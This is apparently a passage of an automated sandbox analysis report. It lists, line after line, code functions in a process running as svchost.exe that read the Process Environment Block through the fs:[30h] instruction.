Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h] 1_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h] 1_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h] 1_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h] 1_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h] 1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h] 1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h] 1_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390634F mov eax, dword ptr fs:[00000030h] 1_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h] 1_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h] 1_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h] 1_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h] 1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h] 1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390625D mov eax, dword ptr fs:[00000030h] 1_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h] 1_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h] 1_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h] 1_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h] 1_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h] 1_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h] 1_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h] 1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h] 1_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h] 1_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h] 1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h] 1_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h] 1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383208A mov eax, dword ptr fs:[00000030h] 1_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h] 1_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h] 1_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h] 1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h] 1_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h] 1_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h] 1_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h] 1_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h] 1_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h] 1_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h] 1_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h] 1_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832050 mov eax, dword ptr fs:[00000030h] 1_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h] 1_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h] 1_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D678E mov eax, dword ptr fs:[00000030h] 1_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038307AF mov eax, dword ptr fs:[00000030h] 1_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h] 1_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h] 1_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h] 1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h] 1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h] 1_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830710 mov eax, dword ptr fs:[00000030h] 1_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860710 mov eax, dword ptr fs:[00000030h] 1_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h] 1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h] 1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h] 1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h] 1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h] 1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h] 1_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386674D mov esi, dword ptr fs:[00000030h] 1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h] 1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h] 1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830750 mov eax, dword ptr fs:[00000030h] 1_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h] 1_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h] 1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h] 1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h] 1_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838770 mov eax, dword ptr fs:[00000030h] 1_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h] 1_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h] 1_2_03834690
